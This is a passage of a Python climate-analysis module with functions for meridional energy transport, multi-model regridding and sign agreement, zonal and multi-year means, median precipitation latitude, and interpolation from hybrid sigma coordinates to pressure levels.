NetCDF Dataset object for the daily temperature output (K)\n# data_hus: NetCDF Dataset object for the daily specific humidity output (kg/kg)\n# data_zg: NetCDF Dataset object for the daily geopotential height output (m)\n# firstDay: first day of the multi-day mean (measured from 0)\n# lastDay: last day of the multi-day mean (measured from 0)\n#\n# Outputs: 3D NumPy arrays (plev, lat, lon) of energy fluxes in J/kg*m/s\n# \n# Input dimensions: time, plev, lat, lon (in NetCDF Dataset object)\n\ndef meridionalTransportLatentEnergyMultiDayMean(data_va, data_hus, firstDay, lastDay):\n #Physical constants\n Lv = 2.5e6 #Latent heat of vaporization at 0 deg C (J/kg (H2O))\n #Extract data from the NetCDF files\n va = data_va.variables['va'][firstDay:lastDay+1,:,:,:] #m/s\n q = data_hus.variables['hus'][firstDay:lastDay+1,:,:,:] #kg (H2O)/kg (air)\n #Multiply specific humidity by meridional velocity to get the moisture flux\n vq = va*q #kg/kg*m/s\n #Take time mean\n vqbar = np.mean(vq,axis=0)\n #Multiply by Lv to get in energy units\n Lvqbar = Lv*vqbar #J/kg*m/s\n return Lvqbar\n\ndef meridionalTransportGeopotentialEnergyMultiDayMean(data_va, data_zg, firstDay, lastDay):\n #Physical constants\n g = 9.81 #gravitational acceleration (m s^-2)\n #Extract data from the NetCDF files\n va = data_va.variables['va'][firstDay:lastDay+1,:,:,:] #m/s\n zg = data_zg.variables['zg'][firstDay:lastDay+1,:,:,:] #m\n #Multiply together to get flux\n vz = va*zg #m^2/s\n #Take time mean\n vzbar = np.mean(vz,axis=0)\n #Multiply by g to get in energy units\n gvzbar = g*vzbar #m^3/s^3 (J = kg * m^2/s^2 so this is J/kg*m/s)\n return gvzbar \n \n\ndef meridionalTransportThermalEnergyMultiDayMean(data_va, data_ta, firstDay, lastDay):\n #Physical constants\n Cp = 1004. #Heat capacity of air at constant pressure (J kg^-1 K^-1)\n #Extract data from the NetCDF files\n va = data_va.variables['va'][firstDay:lastDay+1,:,:,:] #m/s\n ta = data_ta.variables['ta'][firstDay:lastDay+1,:,:,:] #K\n #Multiply together to get flux\n vt = va*ta #K*m/s\n #Take time mean\n vtbar = np.mean(vt,axis=0)\n #Multiply by Cp to get in energy units\n Cpvtbar = Cp*vtbar #J/kg*m/s\n return Cpvtbar\n \n#Generic function to do zonal and vertical integration for the quantities computed by the above functions. \n#\n# Inputs: \n# flux: 3D array of energy fluxes (units: J/kg*m/s) computed by above 3 functions (dimensions: plev, lat, lon)\n# plev: the pressure levels in Pa\n# lat: the latitudes in degrees\n# lon: the longitudes in degrees\ndef meridionalTransportZonalVerticalIntegration(flux,plev,lat,lon):\n g = 9.81 #gravitational acceleration (m s^-2)\n a = 6.37e6 #Radius of earth (meters)\n #First do vertical integration (= integral of flux*dp/g (see Overland et al., 1996, eq. 1))\n pdiff = -1.*np.diff(plev) #Differences between the pressure levels (Pa) (listed descending so flip sign)\n fluxInterp = (flux[0:len(plev)-1,:,:]+flux[1:len(plev),:,:])/2. #Average flux values midway between pressure levels\n verticallyIntegratedFlux = np.sum(fluxInterp*pdiff[:,None,None]/g, axis=0) #Vertically integrated flux (W/m) (lat,lon)\n #Now do zonal integration (= integral of vertically integrated flux * dx)\n lonDiff = lon[1]-lon[0] \n gridCellWidth = (lonDiff*np.pi/180.)*a*np.cos(lat*np.pi/180.) #Width of each grid cell (m) (1-D array, dimension: lat)\n zonallyIntegratedFlux = np.sum(verticallyIntegratedFlux*gridCellWidth[:,None],axis=1) #Northward energy transport (W) (lat)\n return zonallyIntegratedFlux\n \n# Alternative version of above function that uses original flux values and weights according to distance between \n# midpoints between pressure levels (to avoid mask \"bleeding\" into level above bottom, if bottom masked due to terrain) \ndef meridionalTransportZonalVerticalIntegrationV2(flux,plev,lat,lon):\n g = 9.81 #gravitational acceleration (m s^-2)\n a = 6.37e6 #Radius of earth (meters)\n #First do vertical integration (= integral of flux*dp/g (see Overland et al., 1996, eq. 1))\n pMidpoints = (plev[0:len(plev)-1]+plev[1:len(plev)])/2.\n pWeights = -1.*np.diff(pMidpoints) #Differences between the pressure levels (Pa) (listed descending so flip sign)\n pWeights = np.append(plev[0]-pMidpoints[0], pWeights)\n pWeights = np.append(pWeights, pMidpoints[-1])\n #print(plev) #Debug\n #print(pWeights) #Debug\n verticallyIntegratedFlux = np.sum(flux*pWeights[:,None,None]/g, axis=0) #Vertically integrated flux (W/m) (lat,lon)\n #Now do zonal integration (= integral of vertically integrated flux * dx)\n lonDiff = lon[1]-lon[0] \n gridCellWidth = (lonDiff*np.pi/180.)*a*np.cos(lat*np.pi/180.) #Width of each grid cell (m) (1-D array, dimension: lat)\n zonallyIntegratedFlux = np.sum(verticallyIntegratedFlux*gridCellWidth[:,None],axis=1) #Northward energy transport (W) (lat)\n return zonallyIntegratedFlux\n \n# Function to calculate the multi-model mean when you have arrays that are functions of latitudes \n# (e.g. zonal mean, northward energy transport) for multiple models. This function first interpolates\n# each model's output to a common grid, then averages over the different models. \n#\n# Inputs: \n# arrayDict: dictionary containing the 1-D arrays that vary as a function of latitude\n# latDict: dictionary containing the 1-D arrays of latitudes\n# interpLats: latitudes to interpolate to\n# \n# The 2 dictionaries should have identical keys designating which model the data is from.\n# Should be both the same size.\ndef multiModelMeanLatitudeVarying(arrayDict, latDict, interpLats):\n #interpLats = np.linspace(-90.,90.,181) #Interpolate to 1-degree grid #No-make this an argument\n interpMat = np.zeros((len(arrayDict.keys()),len(interpLats))) #Fill this matrix one model at a time\n i = 0\n for key in arrayDict.keys():\n interpMat[i,:] = np.interp(interpLats, latDict[key], arrayDict[key])\n i = i + 1\n multiModelMean = np.mean(interpMat, axis=0)\n return multiModelMean\n \n# Function to regrid 2D arrays with latitude-pressure dimensions to a common \n# set of latitudes (assuming the pressure levels are all the same).\n#\n# This is analogous to the function above called \"multiModelMeanLatitudeVarying\" \n# but does loop of np.interp over the different pressure levels.\n# \n# Inputs: \n# arrayDict: dictionary containing the 2-D arrays that vary as a function of latitude and pressure\n# (dimensions in that order)\n# latDict: dictionary containing the 1-D arrays of latitudes for each model\n# interpLats: latitudes to interpolate to\n# numLevels: number of pressure levels (too hard to extract from the dict without knowing variable name)\n# (default 17: this is the number of standard CMIP5 pressure levels)\n#\n# Returns:\n# A 3D array with dimensions (lat, height, model) \n# Order of models not guaranteed.\n# \n# Also doesn't do mean over the models (do that in script). \n# The \"arraySignAgreement3D\" function should work for output from this, as well \n# as for the lat-lon version.\ndef collocateModelsLatitudePressure(arrayDict, latDict, interpLats, numLevels=17):\n i = 0 #Loop counter for models\n for key in arrayDict.keys():\n print('Interpolating to common latitudes for model: ' + modelNames[key])\n if i == 0: \n array3D = np.zeros((len(interpLats), numLevels, len(arrayDict.keys()))) #initialize array to return\n for j in np.arange(numLevels): #Loop over pressure levels\n #print(j)\n# print(np.shape(interpLats))\n# print(np.shape(latDict[key]))\n# print(np.shape(arrayDict[key]))\n# print(interpLats)\n# print(latDict[key])\n# print(arrayDict[key])\n array3D[:,j,i] = np.interp(interpLats, latDict[key], arrayDict[key][j,:])\n i = i + 1\n return array3D\n \n \n \n# Functions for taking multi-model statistics (means, agreement on sign, etc.) \n# on lat-lon grid. \n# General strategy is to loop through the models, \n# regrid the model output to a specific grid, and save to a 3D array (lat, lon, model). \n# Return this in one function; then have other functions that calculate things like \n# agreement.\n \n# Function to create a 3D array of regridded data, given dicts of model data, lats and lons, (which must all have same keys), \n# and lats and lons to interpolate to (lats and lons are 1D arrays).\n# The order of the models will be dependent on the input dicts, so I shouldn't write any code that assumes the order matters. \n# This uses the scipi.interpolate.griddata function, with the default linear interpolation.\n#\n# Required some reshaping to make data \"unstructured\". See \"griddataTest.py\" to understand the logic of this. \n# This seems to run reasonably fast, for interpolating to 2-degree grid. \n# Input data dimensions must be (lat, lon).\n#\n# Inside this function, x is lats, y is lons.\n# For \"method\" (linear, nearest, etc.): see griddata documentation\ndef collocateModels(modelData, modelLats, modelLons, interpLats, interpLons, method='linear'):\n array3D = np.zeros((len(interpLats), len(interpLons), len(modelData.keys()))) #Create empty array to fill in\n interpPoints_x, interpPoints_y = np.meshgrid(interpLats, interpLons)\n interpPoints_x = np.transpose(interpPoints_x)\n interpPoints_y = np.transpose(interpPoints_y)\n i = 0 #loop counter\n for key, value in modelData.items():\n print('Interpolating for model: ')\n print(key)\n #Need to reshape the modelData to be unstructured, and also create lists of lats and lons. \n #For linear and cubic methods, gives NaN for points outside \"convex hull\" of the data, meaning\n #NaNs at poles and the prime meridian. Poles are fine, but I don't want white strip at \n #prime meridian. Get around this by duplicating end values (i.e. \"pad\" the data and longitudes). \n if not(method == 'nearest'):\n #Need to choose a new variable name because otherwise Python changes the original modelData and modelLons called by the function\n #instead off making a copy, which causes a bug if the function is called twice in one script for the same model. \n modelDataPadded = np.append(modelData[key][:,-1:], modelData[key], axis=1) #Append the end value to the beginning\n print('modelDataPadded: ' + str(np.shape(modelDataPadded)))\n modelDataPadded = np.append(modelDataPadded, modelDataPadded[:,1:2], axis=1) #Append the (original) beginning value to the end\n print('modelDataPadded: ' + str(np.shape(modelDataPadded)))\n lonSpacing = modelLons[key][1] - modelLons[key][0] #All models have evenly spaced longitude grid\n modelLonsPadded = np.insert(modelLons[key], 0, modelLons[key][0]-1*lonSpacing) #Add additional longitude to beginning\n print('modelLonsPadded: ' + str(np.shape(modelLonsPadded))) \n modelLonsPadded = np.insert(modelLonsPadded, len(modelLonsPadded), modelLonsPadded[-1]+lonSpacing) #Add additional longitude to end\n print('modelLonsPadded: ' + str(np.shape(modelLonsPadded)))\n flatData = modelDataPadded.flat[:]\n print('flatData: ' + str(np.shape(flatData)))\n flatLons = np.tile(modelLonsPadded, (1, len(modelLats[key]))).flat[:]\n print('flatLons: ' + str(np.shape(flatLons)))\n tiledLats = np.tile(modelLats[key], (len(modelLonsPadded),1))\n print('tiledLats: ' + str(np.shape(tiledLats)))\n else:\n flatData = modelData[key].flat[:]\n flatLons = np.tile(modelLons[key], (1, len(modelLats[key]))).flat[:] \n tiledLats = np.tile(modelLats[key], (len(modelLons[key]), 1))\n transposedTiledLats = np.transpose(tiledLats)\n print('transposedTiledLats: ' + str(np.shape(transposedTiledLats)))\n flatLats = transposedTiledLats.flat[:]\n print('flatLats: ' + str(np.shape(flatLats)))\n points = np.zeros((len(flatLats),2))\n points[:,0] = flatLats\n points[:,1] = flatLons\n print(np.shape(value))\n print(np.shape(points))\n print(np.shape(flatData))\n print(np.shape(interpPoints_x))\n print(np.shape(interpPoints_y))\n array3D[:,:,i] = scipy.interpolate.griddata(points, flatData, (interpPoints_x, interpPoints_y), method=method)\n i = i + 1\n return array3D \n\n \n# Function to return true when no more than a certain number (\"maxDisagreeing\") \n# of elements on a 3d array, looking along a specific dimension, disagree on the sign from the overall consensus. \n# Anticipate using this along \"model\" dimension (dim=2) for the output from the \"collocateModels\" function.\ndef arraySignAgreement3D(array, maxDisagreeing, dim = 2):\n isPositiveArray = array > 0 #(Won't count zero as agreeing on sign of change; this is more conservative)\n sumPositives = np.sum(isPositiveArray, axis=dim)\n n = np.shape(array)[dim]\n # OK, this algorithm is kind of confusing, so here's an explanation of how it works, using example of 9\n # models, when I want at least 7 to agree on sign. \n # I have at each grid point the number models with a positive sign. \n # If this number is 0, 1 or 2, then most of the models are negative with at most 2 positives. \n # If this number is 7, 8, or 9, then most of the models are positive with at most 2 negatives. \n # I create a Boolean array for each of these cases separately, then use a bitwise or to combine them\n # (get an error if I try to do this all in one line). \n positivesWhenMostNegative = sumPositives <= maxDisagreeing\n negativesWhenMostPositive = sumPositives >= n - maxDisagreeing\n returnArray = positivesWhenMostNegative | negativesWhenMostPositive\n return returnArray\n\n# Function to calculate mean of a variable from start of one year to end of a later year,\n# for multi-year or multidecadal means. Not taking a global mean, despite the name--intended for mapping. \n# Years measured from 0. Optional monthOffset allows for starting from a month other than the first month\n# in the dataset (useful for model runs that don't start in January, for example).\n# \ndef multiYearMean(Data, varname, firstYear, lastYear, monthOffset=0, calendar='360', leapYears='none'):\n allData = np.squeeze(Data.variables[varname][:]) #Squeeze in case it's one slice of a 4D array\n #yearMeanData = np.mean(allData[firstYear*12+monthOffset:lastYear*12+12+monthOffset,:,:],axis=0)\n yearMeanData = enhancedTimeMean(allData[firstYear*12+monthOffset:lastYear*12+12+monthOffset,:,:],\n calendar=calendar, leapYears=leapYears)\n return yearMeanData \n \n# Function to calculate the global mean of a variable\n# from the GeoMIP output from start of one year to end of a later year. \ndef globalMeanMultiYear(Data, varname, firstYear, lastYear, monthOffset=0): #\"data\" is netCDF4 data object\n yearMeanData = multiYearMean(Data, varname, firstYear, lastYear, monthOffset) #Take time mean; gives 2D array (lat,lon)\n #print(np.shape(yearMeanData)) #debug\n latitudes = Data.variables['lat'][:]\n areaWeights = np.cos(latitudes*np.pi/180)\n areaWeights2D = np.tile(areaWeights,(np.shape(yearMeanData)[1],1))\n #print(np.shape(areaWeights2D)) #debug\n areaWeights2D = np.swapaxes(areaWeights2D,0,1)\n weighted2DMatrix = yearMeanData*areaWeights2D\n sumWeighted = np.sum(weighted2DMatrix)\n sumWeights = np.sum(areaWeights2D)\n weightedMean = sumWeighted/sumWeights\n return weightedMean \n \n# Function to calculate zonal mean of a vairable from start of one year to end of a later year. \n# Use the \"globalMeanMultiYear\" function above and then do zonal average. \ndef zonalMeanMultiYear(Data, varname, firstYear, lastYear, monthOffset=0, calendar='360', leapYears='none'):\n yearMeanData = multiYearMean(Data, varname, firstYear, lastYear, monthOffset, calendar, leapYears) \n zonalMeanData = np.mean(yearMeanData, axis=1) \n return zonalMeanData\n \n# Function to calculate the latitude of the median precipitation in a zonal mean \n# precipitation profile--that is, latitude at which half of precipitation is \n# to the north and half is to the south.\n#\n# Inputs:\n# zonalMeanData: the zonal mean of the precipitation (calculated e.g. by zonalMeanMultiYear() function)\n# lats: the latitudes corresponding to the zonalMeanData profile\n# minLat: the minimum latitude to consider when taking the median\n# maxLat: the maximum latitude to consider when taking the median\ndef precipMedian(zonalMeanData, lats, minLat, maxLat):\n a = lats >= minLat\n b = lats <= maxLat\n c = a*b\n zonalMeanSubset = zonalMeanData[c]\n latsSubset = lats[c]\n areaWeightedPrecip = zonalMeanSubset*np.cos(latsSubset*np.pi/180)\n totalPrecip = np.sum(areaWeightedPrecip)\n precipFraction = areaWeightedPrecip / totalPrecip\n cumulativePrecipFraction = np.cumsum(precipFraction)\n #Find highest latitude < 50% of rain and lowest latitude > 50% of rain\n indexLowerBound = np.argmin(1./(cumulativePrecipFraction-0.5)) #1/ means largest neg. number is closest to .5 on the - side\n indexUpperBound = np.argmax(1./(cumulativePrecipFraction-0.5)) #1/ means largest pos. number is closest to .5 on the + side\n lowerLat = latsSubset[indexLowerBound]\n upperLat = latsSubset[indexUpperBound]\n #Interpolate between the 2 latitudes based on how close 50% is to either side\n medianLat = lowerLat + (upperLat-lowerLat)*(.5-cumulativePrecipFraction[indexLowerBound])/(\n cumulativePrecipFraction[indexUpperBound]-cumulativePrecipFraction[indexLowerBound])\n return medianLat\n \n \n#Function to calculate zonal mean of multiple years of a height-varying variable already \n#in pressure coordinates (e.g. \"ta\" in all the models, or \"cl\" in the GISS model).\n#Assuming dimensions are (time, plev, lat, lon). Since we're averaging over longitudes and time, \n#result will be 2D array: plev, lat.\n#\n# Inputs: \n# Data: NetCDF4 Dataset object containing the variable of interest. \n# varname: variable name for the variable in the Data object\n#\n# firstYear: first year of the multi-year mean (measured from start of run)\n# lastYear: last \" \" \" \" \" \" \ndef zonalMeanMultiYearPressureCoordinates(Data, varname, firstYear, lastYear):\n datavar = Data.variables[varname][firstYear*12:lastYear*12+12,:,:,:] #time, plev, lat, lon\n #print(datavar[0,:,:,0]) #Debug: see how missing data are handled\n #print(datavar[0,:,:,50]) #Debug: see how missing data are handled\n #What happens is, it reads them in as masked arrays. So mean works fine, but this poses problems for \n #saving output as npy files. \n dataZonalMean = np.nanmean(datavar, axis=3) #Not quite sure how missing data are handled\n dataTimeMean = np.nanmean(dataZonalMean, axis=0)\n return dataTimeMean\n \n \n# Function to interpolate height-varying model output variables to desired pressure levels and calculate\n# zonal mean and multi-year mean. Takes some inspiration from code by Dan Vimont at\n# http://www.aos.wisc.edu/~dvimont/matlab/\n#\n# This version is for Hybrid Sigma vertical coordinates.\n#\n# Inputs: \n# Data: NetCDF4 Dataset object containing the variable of interest. \n# varname: variable name for the variable in the Data object\n# pLevels: pressure levels to interpolate to, in hPa. \n# firstYear: first year of the multi-year mean (measured from start of run)\n# lastYear: last \" \" \" \" \" \"\n# modelTag: 2-letter tag for the model (see elsewhere in this module), \n# for model-specific variations in coordinate variable names, etc.\n# DataPS: optional--NetCDF4 Dataset object containing the surface pressure data. This is \n# optional because some of the other files (\"cl\", etc.) already have this. \n# varPS: optional--PS specified as array instead of Dataset object (for CSIRO model)\n#\n# Output:\n# A 2-D Numpy array with latitude on one axis and pressure on the other, and NaNs where no data exist \n# due to terrain (i.e. over Antarctica). Dimension order: pressure, latitude\ndef zonalMeanMultiYearPressureVaryingVariable(Data, varname, pLevels, firstYear, lastYear, modelTag, DataPS='none', varPS = 'none'):\n \n # Extract the data from the objects as well as the surface pressure\n datavar = Data.variables[varname][firstYear*12:lastYear*12+12,:,:,:] #time, lev, lat, lon\n if varPS == 'none': \n if DataPS == 'none':\n PS = Data.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n else:\n PS = DataPS.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n else: #Specify PS as Python array (variable) defined outside the function, rather than NetCDF Dataset object\n PS = varPS\n \n # Calculate pressure at the points where the Data are located.\n # Conversion from hybrid sigma levels to pressure levels\n # based on equation: #P[i,j,k] = a[k]*p0 + b[k]*PS[i,j] \n # But P and PS vary in time whereas a and b don't, so need to use broadcasting. \n B = Data.variables['b'][:] #dimension: lev\n if(modelTag == 'ca' or modelTag == 'ip' or modelTag == 'mp'): #CanESM or IPSL or MPI model\n AkP0 = Data.variables['ap'][:] #Pa; dimension: lev\n else: #BNU or CCSM4 or MIROC model (as of June 27th, 2016) #June 1, 2017: CESM and NorESM also this way\n #P0 = Data.variables['p0'][:] #Reference pressure (Pa)\n P0 = 100000 #Reference pressure (Pa). It's 100000 in all the models, but CCSM and CESM mistakenly used hPa.\n #print(np.shape(P0))\n A = Data.variables['a'][:] #Dimension: lev\n #print(np.shape(A))\n AkP0 = A*P0\n #print(np.shape(AkP0))\n BkPSij = B[None,:,None,None]*PS[:,None,:,:] #Result: 4D array (time, lev, lat, lon)\n print('Shape of 4D array to interpolate:')\n print(np.shape(BkPSij))\n pressureMat = (AkP0[None,:,None,None] + BkPSij)/100. #Divide by 100 to go from Pa to hPa\n \n # Okay, now the hard part:\n # Interpolate the data from the model's native pressure levels to the desired pressure levels. \n # The model's pressure levels vary with time, latitude, and longitude, whereas we need consistent\n # pressure levels for time and zonal averaging. So we have to do a linear interpolation in the \n # vertical coordinate that varies with latitude, longitude and time. But doing this in nested loops\n # is way too slow, so we need to use matrix operations. \n #\n # Further complicating the picture is the fact that sometimes the desired pressure level lies outside\n # the range of the model pressure levels, e.g. due to terrain. To account for this we need to put\n # nans in these places where there is no data, and use nanmean at the end for zonal and time mean. \n #\n # General strategy: only one loop, over the new pressure levels. At each desired pressure level, calculate \n # the difference between the native pressures and the desired pressure, and find the vertical \n # indices of the native pressure closest to the desired pressure above and below. Find the native pressures and \n # the data values corresponding to these indices in order to do the linear interpolation. In order to put nans \n # where there is no data, keep track of indices columns where all native pressures are either \n # above or below the desired pressure, and slot in nans in the appropriate place right before the final \n # interpolation calculation.\n\n # First: reshape the native pressures and data into 2D arrays, with time/latitude/longitude all on one axis\n # and vertical coordinate on the other axis. This makes it simpler to extract data at \n # the particular vertical index we want (which varies with time, latitude, and longitude) later on. \n # But we will still use the 4D arrays in other parts of the calculation.\n s = np.shape(pressureMat)\n numTimes = s[0]\n numLevs = s[1]\n numLats = s[2]\n numLons = s[3] \n #Make vertical level the last axis so that columns remain intact when matrices are reshaped \n pressure2D = np.swapaxes(pressureMat,1,3) #Now it's time, lon, lat, level\n pressure2D = np.reshape(pressure2D, (numTimes*numLats*numLons, numLevs))\n data2D = np.swapaxes(datavar,1,3)\n data2D = np.reshape(data2D, (numTimes*numLats*numLons, numLevs))\n \n # Preallocate array to hold interpolated data\n interpMat = np.empty((pressureMat.shape[0], len(pLevels), pressureMat.shape[2], pressureMat.shape[3]))\n \n # Now: loop over the desired pressure levels and interpolate data to each one\n for k in range(0, len(pLevels)):\n print('Interpolating to ' + str(pLevels[k]) + ' hPa')\n \n # This code block: find the upper boundaries of the native pressure and data for interpolation\n print('Positive side')\n pressureMatDiffPos = pressureMat - pLevels[k] #Result: 4D array of differences between native and desired pressure.\n #Positive values: higher native pressure than the level we're filling\n #Negative values: lower native pressure than the level we're filling\n # We're only interested in positive values (higher pressure end) for now, \n # so set negative ones to a very high number and then find the index associated with the minimum along the \n # vertical coordinate. \n pressureMatDiffPos[pressureMatDiffPos < 0] = 1.e10\n upperIndex = np.argmin(pressureMatDiffPos, axis=1) #upperIndex is 3D array in time, lat, lon\n # Next: Record indices where we're trying to interpolate to greater than the maximum native pressure in the column.\n # If this is the case, every value of pressureMatDiffPos in the column will have been set to 1.e10, so the \n # difference between the max and min in the column will be zero.\n # We'll create an array of boolean values that are true if this is one such column. They'll be used\n # later to slot in nans.\n nanUpperIndex = np.max(pressureMatDiffPos, axis=1) - np.min(pressureMatDiffPos,axis=1) #3D array: time, lat, lon\n nanUpperIndexBool = np.ones(np.shape(nanUpperIndex), dtype = bool)\n nanUpperIndexBool[nanUpperIndex >= 1.e-99] = False\n # Now, convert the 3D arrays containing vertical indices of interest and boolean values for nans to 1D vectors\n upperIndex1D = np.swapaxes(upperIndex, 1,2) #switched lat and lon to match reshaped matrices above \n upperIndex1D = np.reshape(upperIndex1D, numTimes*numLats*numLons) #Convert to a vector\n nanUpperIndex1D = np.swapaxes(nanUpperIndexBool, 1,2)\n nanUpperIndex1D = np.reshape(nanUpperIndex1D, numTimes*numLats*numLons)\n # Now, extract the native pressure and data values at the upper bound indices we found\n # (I tested this method for extracting data using a sample 2D array in the command line)\n upperPressureBound = pressure2D[range(0,len(upperIndex1D)),upperIndex1D] #Result: 1D vector \n upperDataBound = data2D[range(0,len(upperIndex1D)),upperIndex1D]\n # Set the pressure and data boundary data to nans where we are trying to interpolate to outside the data range\n upperPressureBound[nanUpperIndex1D] = np.nan \n upperDataBound[nanUpperIndex1D] = np.nan \n #print(upperDataBound) #debug output\n \n # This code block: same as above but for the lower boundaries. (far less comments)\n print('Negative side')\n pressureMatDiffNeg = pressureMat - pLevels[k] \n pressureMatDiffNeg[pressureMatDiffNeg > 0] = 1.e10 #This time we are only interested in negative values\n lowerIndex = np.argmin(np.abs(pressureMatDiffNeg), axis=1) \n nanLowerIndex = np.max(pressureMatDiffNeg, axis=1) - np.min(pressureMatDiffNeg,axis=1) \n nanLowerIndexBool = np.ones(np.shape(nanLowerIndex), dtype = bool)\n nanLowerIndexBool[nanLowerIndex >= 1.e-99] = False\n lowerIndex1D = np.swapaxes(lowerIndex, 1,2) \n lowerIndex1D = np.reshape(lowerIndex1D, numTimes*numLats*numLons) \n nanLowerIndex1D = np.swapaxes(nanLowerIndexBool, 1,2)\n nanLowerIndex1D = np.reshape(nanLowerIndex1D, numTimes*numLats*numLons) \n lowerPressureBound = pressure2D[range(0,len(lowerIndex1D)),lowerIndex1D] \n lowerDataBound = data2D[range(0,len(lowerIndex1D)),lowerIndex1D]\n lowerPressureBound[nanLowerIndex1D] = np.nan \n lowerDataBound[nanLowerIndex1D] = np.nan\n #print(lowerDataBound) #debug output\n \n # Now: linearly interpolate the data in log pressure space \n # (interpolating in log pressure means interpolating linearly w.r.t. height)\n interpVec = lowerDataBound+(upperDataBound-lowerDataBound)*(np.log(pLevels[k])-np.log(lowerPressureBound))/(\n np.log(upperPressureBound)-np.log(lowerPressureBound)) \n \n # Finally: Reshape to 3D matrix to put in the later 4D matrix\n interpSlice = np.reshape(interpVec, (numTimes, numLons, numLats)) #time, lon, lat for consistency with above\n interpSlice = np.swapaxes(interpSlice,1,2) # switch lat and lon again\n interpMat[:,k,:,:] = interpSlice #Populate the returned matrix\n \n print('Finished k = ' + str(k))\n \n # Now we have a 4D matrix of interpolated data in time, pressure, latitude and longitude.\n # Now take zonal and time means\n interpMatZonalMean = np.nanmean(interpMat, axis=3)\n interpMatTimeMean = np.nanmean(interpMatZonalMean, axis=0)\n \n return interpMatTimeMean\n \n#Similar function for hybrid height coordinates, for the HadGEM2-ES model. \n\n \n \n \n# Function similar to above but without the zonal or time means, to return a 4D array that I can do other \n# things with in wrapper functions. Subset in time (to save on computation) but don't take time mean yet. \n# This time will not have model as input; instead check for which format of hybrid sigma coordinates is used.\n#\n# Inputs: \n# Data: NetCDF4 Dataset object containing the variable of interest. \n# varname: variable name for the variable in the Data object\n# pLevels: pressure levels to interpolate to, in hPa. \n# firstYear: first year of the time subset (measured from start of run, where start year is 0)\n# lastYear: last \" \" \" \" \" \"\n# DataPS: optional--NetCDF4 Dataset object containing the surface pressure output. This is \n# optional because some of the other files (\"cl\", etc.) already have this. \n#\n# Output:\n# A 4-D Numpy array with dimensions: time, pressure, lat, lon\n# and NaNs where no data exist due to terrain (i.e. over Antarctica). \n#\ndef convertHybridSigmaToPressureCoords(Data, varname, pLevels, firstYear, lastYear, DataPS='none'):\n # Extract the output from the objects, and do time subset\n datavar = Data.variables[varname][firstYear*12:lastYear*12+12,:,:,:] #time, lev, lat, lon\n if DataPS == 'none':\n PS = Data.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n else:\n PS = DataPS.variables['ps'][firstYear*12:lastYear*12+12,:,:] #time, lat, lon; Surface pressure (Pa)\n \n #See above function for more detailed documentation.\n \n # Calculate pressure at the points where the Data are located.\n # Conversion from hybrid sigma levels to pressure levels\n # based on equation: #P[i,j,k] = a[k]*p0 + b[k]*PS[i,j] \n # But P and PS vary in time whereas a and b don't, so need to use broadcasting. \n B = Data.variables['b'][:] #dimension: lev\n if('ap' in Data.variables.keys()): #CanESM or IPSL or MPI model\n AkP0 = Data.variables['ap'][:] #Pa; dimension: lev\n else: #BNU or CCSM4 or MIROC model (as of June 27th, 2016) #June 1, 2017: CESM and NorESM also this way\n #P0 = Data.variables['p0'][:] #Reference pressure (Pa)\n P0 = 100000 #Reference pressure (Pa). It's 100000 in all the models, but CCSM and CESM mistakenly used hPa.\n A = Data.variables['a'][:] #Dimension: lev\n AkP0 = A*P0\n BkPSij = B[None,:,None,None]*PS[:,None,:,:] #Result: 4D array (time, lev, lat, lon)\n pressureMat = (AkP0[None,:,None,None] + BkPSij)/100. #Divide by 100 to go from Pa to hPa\n \n #Reshape output to 2D array \n s = np.shape(pressureMat)\n numTimes = s[0]\n numLevs = s[1]\n numLats = s[2]\n numLons = s[3] \n #Make vertical level the last axis so that columns remain intact when matrices are reshaped \n pressure2D = np.swapaxes(pressureMat,1,3) #Now it's time, lon, lat, level\n pressure2D = np.reshape(pressure2D, (numTimes*numLats*numLons, numLevs))\n data2D = np.swapaxes(datavar,1,3)\n data2D = np.reshape(data2D, (numTimes*numLats*numLons, numLevs))\n \n # Preallocate array to hold interpolated data\n interpMat = np.empty((pressureMat.shape[0], len(pLevels), pressureMat.shape[2], pressureMat.shape[3]))\n \n # Now: loop over the desired pressure levels and interpolate data to each one\n for k in range(0, len(pLevels)):\n print('Interpolating to ' + str(pLevels[k]) + ' hPa')\n \n # This code block: find the upper boundaries of the native pressure and data for interpolation\n print('Positive side')\n pressureMatDiffPos = pressureMat - pLevels[k] #Result: 4D array of differences between native and desired pressure.\n pressureMatDiffPos[pressureMatDiffPos < 0] = 1.e10\n upperIndex = np.argmin(pressureMatDiffPos, axis=1) #upperIndex is 3D array in time, lat, lon\n nanUpperIndex = np.max(pressureMatDiffPos, axis=1) - np.min(pressureMatDiffPos,axis=1) #3D array: time, lat, lon\n nanUpperIndexBool = np.ones(np.shape(nanUpperIndex), dtype = bool)\n nanUpperIndexBool[nanUpperIndex >= 1.e-99] = False\n upperIndex1D = np.swapaxes(upperIndex, 1,2) #switched lat and lon to match reshaped matrices above \n upperIndex1D = np.reshape(upperIndex1D, numTimes*numLats*numLons) #Convert to a vector\n nanUpperIndex1D = np.swapaxes(nanUpperIndexBool, 1,2)\n nanUpperIndex1D = np.reshape(nanUpperIndex1D, numTimes*numLats*numLons)\n upperPressureBound = pressure2D[range(0,len(upperIndex1D)),upperIndex1D] #Result: 1D vector \n upperDataBound = data2D[range(0,len(upperIndex1D)),upperIndex1D]\n # Set the pressure and data boundary data to nans where we are trying to interpolate to outside the data range\n upperPressureBound[nanUpperIndex1D] = np.nan \n upperDataBound[nanUpperIndex1D] = np.nan \n \n # This code block: same as above but for the lower boundaries. \n print('Negative side')\n pressureMatDiffNeg = pressureMat - pLevels[k] \n pressureMatDiffNeg[pressureMatDiffNeg > 0] = 1.e10 #This time we are only interested in negative values\n lowerIndex = np.argmin(np.abs(pressureMatDiffNeg), axis=1) \n nanLowerIndex = np.max(pressureMatDiffNeg, axis=1) - np.min(pressureMatDiffNeg,axis=1) \n nanLowerIndexBool = np.ones(np.shape(nanLowerIndex), dtype = bool)\n nanLowerIndexBool[nanLowerIndex >= 1.e-99] = False\n lowerIndex1D = np.swapaxes(lowerIndex, 1,2) \n lowerIndex1D = np.reshape(lowerIndex1D, numTimes*numLats*numLons) \n nanLowerIndex1D = np.swapaxes(nanLowerIndexBool, 1,2)\n nanLowerIndex1D = np.reshape(nanLowerIndex1D, numTimes*numLats*numLons) \n lowerPressureBound = pressure2D[range(0,len(lowerIndex1D)),lowerIndex1D] \n 